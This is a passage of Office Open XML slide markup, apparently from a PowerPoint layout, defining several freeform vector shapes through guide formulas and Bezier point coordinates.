                    <a:pt x="61" y="24"/>
                    <a:pt x="62" y="21"/>
                    <a:pt x="62" y="16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7" y="12"/>
                    <a:pt x="68" y="10"/>
                    <a:pt x="68" y="8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2" y="5"/>
                    <a:pt x="62" y="5"/>
                    <a:pt x="62" y="5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21"/>
                    <a:pt x="7" y="24"/>
                    <a:pt x="9" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="27"/>
                    <a:pt x="14" y="29"/>
                    <a:pt x="16" y="30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1" y="34"/>
                    <a:pt x="17" y="35"/>
                    <a:pt x="12" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="35"/>
                    <a:pt x="5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12" y="42"/>
                    <a:pt x="21" y="41"/>
                    <a:pt x="27" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="39"/>
                    <a:pt x="31" y="38"/>
                    <a:pt x="34" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="38"/>
                    <a:pt x="39" y="39"/>
                    <a:pt x="41" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="40"/>
                    <a:pt x="49" y="41"/>
                    <a:pt x="54" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="42"/>
                    <a:pt x="63" y="42"/>
                    <a:pt x="68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66" y="36"/>
                    <a:pt x="64" y="36"/>
                    <a:pt x="64" y="36"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="55" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="20"/>
                    <a:pt x="53" y="22"/>
                    <a:pt x="49" y="24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7" y="23"/>
                    <a:pt x="16" y="22"/>
                    <a:pt x="15" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="20"/>
                    <a:pt x="14" y="19"/>
                    <a:pt x="14" y="17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55" y="12"/>
                    <a:pt x="55" y="12"/>
                    <a:pt x="55" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55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8" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8081573" y="-437788"/>
              <a:ext cx="56078" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 34"/>
                <a:gd name="T1" fmla="*/ 7 h 58"/>
                <a:gd name="T2" fmla="*/ 14 w 34"/>
                <a:gd name="T3" fmla="*/ 7 h 58"/>
                <a:gd name="T4" fmla="*/ 14 w 34"/>
                <a:gd name="T5" fmla="*/ 51 h 58"/>
                <a:gd name="T6" fmla="*/ 9 w 34"/>
                <a:gd name="T7" fmla="*/ 51 h 58"/>
                <a:gd name="T8" fmla="*/ 9 w 34"/>
                <a:gd name="T9" fmla="*/ 15 h 58"/>
                <a:gd name="T10" fmla="*/ 2 w 34"/>
                <a:gd name="T11" fmla="*/ 15 h 58"/>
                <a:gd name="T12" fmla="*/ 2 w 34"/>
                <a:gd name="T13" fmla="*/ 51 h 58"/>
                <a:gd name="T14" fmla="*/ 0 w 34"/>
                <a:gd name="T15" fmla="*/ 51 h 58"/>
                <a:gd name="T16" fmla="*/ 0 w 34"/>
                <a:gd name="T17" fmla="*/ 58 h 58"/>
                <a:gd name="T18" fmla="*/ 27 w 34"/>
                <a:gd name="T19" fmla="*/ 58 h 58"/>
                <a:gd name="T20" fmla="*/ 34 w 34"/>
                <a:gd name="T21" fmla="*/ 51 h 58"/>
                <a:gd name="T22" fmla="*/ 34 w 34"/>
                <a:gd name="T23" fmla="*/ 51 h 58"/>
                <a:gd name="T24" fmla="*/ 21 w 34"/>
                <a:gd name="T25" fmla="*/ 51 h 58"/>
                <a:gd name="T26" fmla="*/ 21 w 34"/>
                <a:gd name="T27" fmla="*/ 29 h 58"/>
                <a:gd name="T28" fmla="*/ 34 w 34"/>
                <a:gd name="T29" fmla="*/ 29 h 58"/>
                <a:gd name="T30" fmla="*/ 34 w 34"/>
                <a:gd name="T31" fmla="*/ 22 h 58"/>
                <a:gd name="T32" fmla="*/ 21 w 34"/>
                <a:gd name="T33" fmla="*/ 22 h 58"/>
                <a:gd name="T34" fmla="*/ 21 w 34"/>
                <a:gd name="T35" fmla="*/ 7 h 58"/>
                <a:gd name="T36" fmla="*/ 27 w 34"/>
                <a:gd name="T37" fmla="*/ 7 h 58"/>
                <a:gd name="T38" fmla="*/ 34 w 34"/>
                <a:gd name="T39" fmla="*/ 1 h 58"/>
                <a:gd name="T40" fmla="*/ 34 w 34"/>
                <a:gd name="T41" fmla="*/ 0 h 58"/>
                <a:gd name="T42" fmla="*/ 0 w 34"/>
                <a:gd name="T43" fmla="*/ 0 h 58"/>
                <a:gd name="T44" fmla="*/ 0 w 34"/>
                <a:gd name="T45" fmla="*/ 7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" h="58">
                  <a:moveTo>
                    <a:pt x="0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9" y="51"/>
                    <a:pt x="9" y="51"/>
                    <a:pt x="9" y="5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1" y="58"/>
                    <a:pt x="34" y="55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2"/>
                    <a:pt x="34" y="22"/>
                    <a:pt x="34" y="22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1" y="7"/>
                    <a:pt x="34" y="4"/>
                    <a:pt x="34" y="1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29" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8137651" y="-440903"/>
              <a:ext cx="58415" cy="101252"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 35"/>
                <a:gd name="T1" fmla="*/ 29 h 60"/>
                <a:gd name="T2" fmla="*/ 32 w 35"/>
                <a:gd name="T3" fmla="*/ 12 h 60"/>
                <a:gd name="T4" fmla="*/ 35 w 35"/>
                <a:gd name="T5" fmla="*/ 12 h 60"/>
                <a:gd name="T6" fmla="*/ 35 w 35"/>
                <a:gd name="T7" fmla="*/ 5 h 60"/>
                <a:gd name="T8" fmla="*/ 14 w 35"/>
                <a:gd name="T9" fmla="*/ 5 h 60"/>
                <a:gd name="T10" fmla="*/ 15 w 35"/>
                <a:gd name="T11" fmla="*/ 0 h 60"/>
                <a:gd name="T12" fmla="*/ 7 w 35"/>
                <a:gd name="T13" fmla="*/ 0 h 60"/>
                <a:gd name="T14" fmla="*/ 7 w 35"/>
                <a:gd name="T15" fmla="*/ 1 h 60"/>
                <a:gd name="T16" fmla="*/ 3 w 35"/>
                <a:gd name="T17" fmla="*/ 12 h 60"/>
                <a:gd name="T18" fmla="*/ 1 w 35"/>
                <a:gd name="T19" fmla="*/ 14 h 60"/>
                <a:gd name="T20" fmla="*/ 0 w 35"/>
                <a:gd name="T21" fmla="*/ 14 h 60"/>
                <a:gd name="T22" fmla="*/ 0 w 35"/>
                <a:gd name="T23" fmla="*/ 21 h 60"/>
                <a:gd name="T24" fmla="*/ 1 w 35"/>
                <a:gd name="T25" fmla="*/ 21 h 60"/>
                <a:gd name="T26" fmla="*/ 8 w 35"/>
                <a:gd name="T27" fmla="*/ 18 h 60"/>
                <a:gd name="T28" fmla="*/ 12 w 35"/>
                <a:gd name="T29" fmla="*/ 12 h 60"/>
                <a:gd name="T30" fmla="*/ 24 w 35"/>
                <a:gd name="T31" fmla="*/ 12 h 60"/>
                <a:gd name="T32" fmla="*/ 23 w 35"/>
                <a:gd name="T33" fmla="*/ 29 h 60"/>
                <a:gd name="T34" fmla="*/ 19 w 35"/>
                <a:gd name="T35" fmla="*/ 40 h 60"/>
                <a:gd name="T36" fmla="*/ 15 w 35"/>
                <a:gd name="T37" fmla="*/ 32 h 60"/>
                <a:gd name="T38" fmla="*/ 12 w 35"/>
                <a:gd name="T39" fmla="*/ 20 h 60"/>
                <a:gd name="T40" fmla="*/ 12 w 35"/>
                <a:gd name="T41" fmla="*/ 20 h 60"/>
                <a:gd name="T42" fmla="*/ 5 w 35"/>
                <a:gd name="T43" fmla="*/ 20 h 60"/>
                <a:gd name="T44" fmla="*/ 5 w 35"/>
                <a:gd name="T45" fmla="*/ 20 h 60"/>
                <a:gd name="T46" fmla="*/ 11 w 35"/>
                <a:gd name="T47" fmla="*/ 40 h 60"/>
                <a:gd name="T48" fmla="*/ 14 w 35"/>
                <a:gd name="T49" fmla="*/ 46 h 60"/>
                <a:gd name="T50" fmla="*/ 3 w 35"/>
                <a:gd name="T51" fmla="*/ 53 h 60"/>
                <a:gd name="T52" fmla="*/ 3 w 35"/>
                <a:gd name="T53" fmla="*/ 53 h 60"/>
                <a:gd name="T54" fmla="*/ 3 w 35"/>
                <a:gd name="T55" fmla="*/ 60 h 60"/>
                <a:gd name="T56" fmla="*/ 3 w 35"/>
                <a:gd name="T57" fmla="*/ 60 h 60"/>
                <a:gd name="T58" fmla="*/ 11 w 35"/>
                <a:gd name="T59" fmla="*/ 57 h 60"/>
                <a:gd name="T60" fmla="*/ 19 w 35"/>
                <a:gd name="T61" fmla="*/ 51 h 60"/>
                <a:gd name="T62" fmla="*/ 25 w 35"/>
                <a:gd name="T63" fmla="*/ 55 h 60"/>
                <a:gd name="T64" fmla="*/ 34 w 35"/>
                <a:gd name="T65" fmla="*/ 60 h 60"/>
                <a:gd name="T66" fmla="*/ 35 w 35"/>
                <a:gd name="T67" fmla="*/ 60 h 60"/>
                <a:gd name="T68" fmla="*/ 35 w 35"/>
                <a:gd name="T69" fmla="*/ 53 h 60"/>
                <a:gd name="T70" fmla="*/ 35 w 35"/>
                <a:gd name="T71" fmla="*/ 53 h 60"/>
                <a:gd name="T72" fmla="*/ 24 w 35"/>
                <a:gd name="T73" fmla="*/ 46 h 60"/>
                <a:gd name="T74" fmla="*/ 28 w 35"/>
                <a:gd name="T75" fmla="*/ 38 h 60"/>
                <a:gd name="T76" fmla="*/ 30 w 35"/>
                <a:gd name="T77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5" h="60">
                  <a:moveTo>
                    <a:pt x="30" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="24"/>
                    <a:pt x="31" y="18"/>
                    <a:pt x="32" y="12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7"/>
                    <a:pt x="4" y="11"/>
                    <a:pt x="3" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="13"/>
                    <a:pt x="2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4" y="21"/>
                    <a:pt x="6" y="19"/>
                    <a:pt x="8" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="16"/>
                    <a:pt x="11" y="14"/>
                    <a:pt x="1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21"/>
                    <a:pt x="23" y="26"/>
                    <a:pt x="23" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="32"/>
                    <a:pt x="21" y="36"/>
                    <a:pt x="19" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="37"/>
                    <a:pt x="16" y="35"/>
                    <a:pt x="15" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="29"/>
                    <a:pt x="13" y="25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9"/>
                    <a:pt x="9" y="36"/>
                    <a:pt x="11" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="41"/>
                    <a:pt x="13" y="43"/>
                    <a:pt x="14" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="49"/>
                    <a:pt x="7" y="51"/>
                    <a:pt x="3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6" y="59"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="11" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="55"/>
                    <a:pt x="16" y="54"/>
                    <a:pt x="19" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="53"/>
                    <a:pt x="23" y="54"/>
                    <a:pt x="25" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="57"/>
                    <a:pt x="30" y="58"/>
                    <a:pt x="34" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="60"/>
                    <a:pt x="35" y="60"/>
                    <a:pt x="35" y="60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5" y="53"/>
                    <a:pt x="35" y="53"/>
                    <a:pt x="35" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="51"/>
                    <a:pt x="27" y="49"/>
                    <a:pt x="24" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="43"/>
                    <a:pt x="27" y="40"/>
                    <a:pt x="28" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="35"/>
                    <a:pt x="30" y="32"/>
                    <a:pt x="3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0" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8209306" y="-414422"/>
              <a:ext cx="113713" cy="74770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 39 w 68"/>
                <a:gd name="T1" fmla="*/ 21 h 44"/>
                <a:gd name="T2" fmla="*/ 62 w 68"/>
                <a:gd name="T3" fmla="*/ 21 h 44"/>
                <a:gd name="T4" fmla="*/ 68 w 68"/>
                <a:gd name="T5" fmla="*/ 15 h 44"/>
                <a:gd name="T6" fmla="*/ 68 w 68"/>
                <a:gd name="T7" fmla="*/ 13 h 44"/>
                <a:gd name="T8" fmla="*/ 39 w 68"/>
                <a:gd name="T9" fmla="*/ 13 h 44"/>
                <a:gd name="T10" fmla="*/ 39 w 68"/>
                <a:gd name="T11" fmla="*/ 0 h 44"/>
                <a:gd name="T12" fmla="*/ 31 w 68"/>
                <a:gd name="T13" fmla="*/ 0 h 44"/>
                <a:gd name="T14" fmla="*/ 31 w 68"/>
                <a:gd name="T15" fmla="*/ 36 h 44"/>
                <a:gd name="T16" fmla="*/ 16 w 68"/>
                <a:gd name="T17" fmla="*/ 36 h 44"/>
                <a:gd name="T18" fmla="*/ 16 w 68"/>
                <a:gd name="T19" fmla="*/ 10 h 44"/>
                <a:gd name="T20" fmla="*/ 8 w 68"/>
                <a:gd name="T21" fmla="*/ 10 h 44"/>
                <a:gd name="T22" fmla="*/ 8 w 68"/>
                <a:gd name="T23" fmla="*/ 36 h 44"/>
                <a:gd name="T24" fmla="*/ 0 w 68"/>
                <a:gd name="T25" fmla="*/ 36 h 44"/>
                <a:gd name="T26" fmla="*/ 0 w 68"/>
                <a:gd name="T27" fmla="*/ 44 h 44"/>
                <a:gd name="T28" fmla="*/ 62 w 68"/>
                <a:gd name="T29" fmla="*/ 44 h 44"/>
                <a:gd name="T30" fmla="*/ 68 w 68"/>
                <a:gd name="T31" fmla="*/ 38 h 44"/>
                <a:gd name="T32" fmla="*/ 68 w 68"/>
                <a:gd name="T33" fmla="*/ 36 h 44"/>
                <a:gd name="T34" fmla="*/ 39 w 68"/>
                <a:gd name="T35" fmla="*/ 36 h 44"/>
                <a:gd name="T36" fmla="*/ 39 w 68"/>
                <a:gd name="T37" fmla="*/ 2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8" h="44">
                  <a:moveTo>
                    <a:pt x="39" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="21"/>
                    <a:pt x="62" y="21"/>
                    <a:pt x="62" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="21"/>
                    <a:pt x="68" y="18"/>
                    <a:pt x="68" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="13"/>
                    <a:pt x="68" y="13"/>
                    <a:pt x="6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5" y="44"/>
                    <a:pt x="68" y="41"/>
                    <a:pt x="68" y="38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39" y="36"/>
                    <a:pt x="39" y="36"/>
                    <a:pt x="39" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39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1" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8209306" y="-440903"/>
              <a:ext cx="115271" cy="40501"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 69"/>
                <a:gd name="T1" fmla="*/ 17 h 24"/>
                <a:gd name="T2" fmla="*/ 63 w 69"/>
                <a:gd name="T3" fmla="*/ 16 h 24"/>
                <a:gd name="T4" fmla="*/ 60 w 69"/>
                <a:gd name="T5" fmla="*/ 13 h 24"/>
                <a:gd name="T6" fmla="*/ 56 w 69"/>
                <a:gd name="T7" fmla="*/ 7 h 24"/>
                <a:gd name="T8" fmla="*/ 52 w 69"/>
                <a:gd name="T9" fmla="*/ 2 h 24"/>
                <a:gd name="T10" fmla="*/ 44 w 69"/>
                <a:gd name="T11" fmla="*/ 0 h 24"/>
                <a:gd name="T12" fmla="*/ 22 w 69"/>
                <a:gd name="T13" fmla="*/ 0 h 24"/>
                <a:gd name="T14" fmla="*/ 11 w 69"/>
                <a:gd name="T15" fmla="*/ 7 h 24"/>
                <a:gd name="T16" fmla="*/ 8 w 69"/>
                <a:gd name="T17" fmla="*/ 13 h 24"/>
                <a:gd name="T18" fmla="*/ 4 w 69"/>
                <a:gd name="T19" fmla="*/ 17 h 24"/>
                <a:gd name="T20" fmla="*/ 0 w 69"/>
                <a:gd name="T21" fmla="*/ 17 h 24"/>
                <a:gd name="T22" fmla="*/ 0 w 69"/>
                <a:gd name="T23" fmla="*/ 17 h 24"/>
                <a:gd name="T24" fmla="*/ 0 w 69"/>
                <a:gd name="T25" fmla="*/ 24 h 24"/>
                <a:gd name="T26" fmla="*/ 0 w 69"/>
                <a:gd name="T27" fmla="*/ 24 h 24"/>
                <a:gd name="T28" fmla="*/ 8 w 69"/>
                <a:gd name="T29" fmla="*/ 23 h 24"/>
                <a:gd name="T30" fmla="*/ 15 w 69"/>
                <a:gd name="T31" fmla="*/ 17 h 24"/>
                <a:gd name="T32" fmla="*/ 18 w 69"/>
                <a:gd name="T33" fmla="*/ 10 h 24"/>
                <a:gd name="T34" fmla="*/ 20 w 69"/>
                <a:gd name="T35" fmla="*/ 8 h 24"/>
                <a:gd name="T36" fmla="*/ 23 w 69"/>
                <a:gd name="T37" fmla="*/ 8 h 24"/>
                <a:gd name="T38" fmla="*/ 44 w 69"/>
                <a:gd name="T39" fmla="*/ 8 h 24"/>
                <a:gd name="T40" fmla="*/ 48 w 69"/>
                <a:gd name="T41" fmla="*/ 8 h 24"/>
                <a:gd name="T42" fmla="*/ 50 w 69"/>
                <a:gd name="T43" fmla="*/ 10 h 24"/>
                <a:gd name="T44" fmla="*/ 54 w 69"/>
                <a:gd name="T45" fmla="*/ 18 h 24"/>
                <a:gd name="T46" fmla="*/ 59 w 69"/>
                <a:gd name="T47" fmla="*/ 23 h 24"/>
                <a:gd name="T48" fmla="*/ 68 w 69"/>
                <a:gd name="T49" fmla="*/ 24 h 24"/>
                <a:gd name="T50" fmla="*/ 69 w 69"/>
                <a:gd name="T51" fmla="*/ 24 h 24"/>
                <a:gd name="T52" fmla="*/ 69 w 69"/>
                <a:gd name="T53" fmla="*/ 17 h 24"/>
                <a:gd name="T54" fmla="*/ 68 w 69"/>
                <a:gd name="T55" fmla="*/ 17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9" h="24">
                  <a:moveTo>
                    <a:pt x="68" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="17"/>
                    <a:pt x="64" y="17"/>
                    <a:pt x="63" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="16"/>
                    <a:pt x="60" y="15"/>
                    <a:pt x="60" y="13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4"/>
                    <a:pt x="54" y="3"/>
                    <a:pt x="52" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="1"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="4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7" y="0"/>
                    <a:pt x="13" y="3"/>
                    <a:pt x="11" y="7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6" y="16"/>
                    <a:pt x="4" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="17"/>
                    <a:pt x="2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" y="24"/>
                    <a:pt x="6" y="24"/>
                    <a:pt x="8" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="22"/>
                    <a:pt x="13" y="20"/>
                    <a:pt x="15" y="17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9" y="9"/>
                    <a:pt x="19" y="9"/>
                    <a:pt x="20" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="8"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="23" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="8"/>
                    <a:pt x="44" y="8"/>
                    <a:pt x="44" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="8"/>
                    <a:pt x="47" y="8"/>
                    <a:pt x="48" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="8"/>
                    <a:pt x="49" y="9"/>
                    <a:pt x="50" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="18"/>
                    <a:pt x="54" y="18"/>
                    <a:pt x="54" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="20"/>
                    <a:pt x="57" y="22"/>
                    <a:pt x="59" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="24"/>
                    <a:pt x="64" y="24"/>
                    <a:pt x="68" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="24"/>
                    <a:pt x="69" y="24"/>
                    <a:pt x="69" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="17"/>
                    <a:pt x="69" y="17"/>
                    <a:pt x="69" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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2" name="Freeform 18"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7600239" y="-267218"/>
              <a:ext cx="59972" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 36"/>
                <a:gd name="T1" fmla="*/ 20 h 35"/>
                <a:gd name="T2" fmla="*/ 10 w 36"/>
                <a:gd name="T3" fmla="*/ 19 h 35"/>
                <a:gd name="T4" fmla="*/ 18 w 36"/>
                <a:gd name="T5" fmla="*/ 20 h 35"/>
                <a:gd name="T6" fmla="*/ 14 w 36"/>
                <a:gd name="T7" fmla="*/ 29 h 35"/>
                <a:gd name="T8" fmla="*/ 16 w 36"/>
                <a:gd name="T9" fmla="*/ 33 h 35"/>
                <a:gd name="T10" fmla="*/ 2 w 36"/>
                <a:gd name="T11" fmla="*/ 35 h 35"/>
                <a:gd name="T12" fmla="*/ 9 w 36"/>
                <a:gd name="T13" fmla="*/ 29 h 35"/>
                <a:gd name="T14" fmla="*/ 5 w 36"/>
                <a:gd name="T15" fmla="*/ 23 h 35"/>
                <a:gd name="T16" fmla="*/ 1 w 36"/>
                <a:gd name="T17" fmla="*/ 20 h 35"/>
                <a:gd name="T18" fmla="*/ 9 w 36"/>
                <a:gd name="T19" fmla="*/ 8 h 35"/>
                <a:gd name="T20" fmla="*/ 12 w 36"/>
                <a:gd name="T21" fmla="*/ 0 h 35"/>
                <a:gd name="T22" fmla="*/ 19 w 36"/>
                <a:gd name="T23" fmla="*/ 8 h 35"/>
                <a:gd name="T24" fmla="*/ 12 w 36"/>
                <a:gd name="T25" fmla="*/ 11 h 35"/>
                <a:gd name="T26" fmla="*/ 13 w 36"/>
                <a:gd name="T27" fmla="*/ 12 h 35"/>
                <a:gd name="T28" fmla="*/ 17 w 36"/>
                <a:gd name="T29" fmla="*/ 18 h 35"/>
                <a:gd name="T30" fmla="*/ 12 w 36"/>
                <a:gd name="T31" fmla="*/ 18 h 35"/>
                <a:gd name="T32" fmla="*/ 9 w 36"/>
                <a:gd name="T33" fmla="*/ 13 h 35"/>
                <a:gd name="T34" fmla="*/ 0 w 36"/>
                <a:gd name="T35" fmla="*/ 17 h 35"/>
                <a:gd name="T36" fmla="*/ 1 w 36"/>
                <a:gd name="T37" fmla="*/ 11 h 35"/>
                <a:gd name="T38" fmla="*/ 2 w 36"/>
                <a:gd name="T39" fmla="*/ 3 h 35"/>
                <a:gd name="T40" fmla="*/ 7 w 36"/>
                <a:gd name="T41" fmla="*/ 6 h 35"/>
                <a:gd name="T42" fmla="*/ 2 w 36"/>
                <a:gd name="T43" fmla="*/ 3 h 35"/>
                <a:gd name="T44" fmla="*/ 11 w 36"/>
                <a:gd name="T45" fmla="*/ 28 h 35"/>
                <a:gd name="T46" fmla="*/ 8 w 36"/>
                <a:gd name="T47" fmla="*/ 23 h 35"/>
                <a:gd name="T48" fmla="*/ 17 w 36"/>
                <a:gd name="T49" fmla="*/ 1 h 35"/>
                <a:gd name="T50" fmla="*/ 15 w 36"/>
                <a:gd name="T51" fmla="*/ 7 h 35"/>
                <a:gd name="T52" fmla="*/ 17 w 36"/>
                <a:gd name="T53" fmla="*/ 1 h 35"/>
                <a:gd name="T54" fmla="*/ 26 w 36"/>
                <a:gd name="T55" fmla="*/ 1 h 35"/>
                <a:gd name="T56" fmla="*/ 35 w 36"/>
                <a:gd name="T57" fmla="*/ 7 h 35"/>
                <a:gd name="T58" fmla="*/ 33 w 36"/>
                <a:gd name="T59" fmla="*/ 9 h 35"/>
                <a:gd name="T60" fmla="*/ 36 w 36"/>
                <a:gd name="T61" fmla="*/ 32 h 35"/>
                <a:gd name="T62" fmla="*/ 27 w 36"/>
                <a:gd name="T63" fmla="*/ 28 h 35"/>
                <a:gd name="T64" fmla="*/ 17 w 36"/>
                <a:gd name="T65" fmla="*/ 33 h 35"/>
                <a:gd name="T66" fmla="*/ 21 w 36"/>
                <a:gd name="T67" fmla="*/ 14 h 35"/>
                <a:gd name="T68" fmla="*/ 18 w 36"/>
                <a:gd name="T69" fmla="*/ 14 h 35"/>
                <a:gd name="T70" fmla="*/ 30 w 36"/>
                <a:gd name="T71" fmla="*/ 9 h 35"/>
                <a:gd name="T72" fmla="*/ 23 w 36"/>
                <a:gd name="T73" fmla="*/ 10 h 35"/>
                <a:gd name="T74" fmla="*/ 30 w 36"/>
                <a:gd name="T75" fmla="*/ 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" h="35">
                  <a:moveTo>
                    <a:pt x="1" y="20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7" y="20"/>
                    <a:pt x="7" y="19"/>
                    <a:pt x="8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9" y="20"/>
                    <a:pt x="9" y="20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7" y="25"/>
                    <a:pt x="15" y="27"/>
                    <a:pt x="14" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="29"/>
                    <a:pt x="16" y="30"/>
                    <a:pt x="18" y="31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5" y="32"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="12" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="32"/>
                    <a:pt x="6" y="34"/>
                    <a:pt x="2" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="34"/>
                    <a:pt x="1" y="33"/>
                    <a:pt x="0" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="32"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="9" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="5" y="27"/>
                    <a:pt x="3" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="25"/>
                    <a:pt x="4" y="24"/>
                    <a:pt x="5" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="20"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1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5" y="13"/>
                    <a:pt x="17" y="15"/>
                    <a:pt x="18" y="16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5" y="17"/>
                    <a:pt x="14" y="15"/>
                    <a:pt x="12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7" y="15"/>
                    <a:pt x="5" y="17"/>
                    <a:pt x="2" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="18"/>
                    <a:pt x="1" y="17"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="15"/>
                    <a:pt x="6" y="13"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="11"/>
                    <a:pt x="1" y="11"/>
                    <a:pt x="1" y="11"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="8"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2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5" y="3"/>
                    <a:pt x="6" y="4"/>
                    <a:pt x="7" y="6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6"/>
                    <a:pt x="3" y="4"/>
                    <a:pt x="2" y="3"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
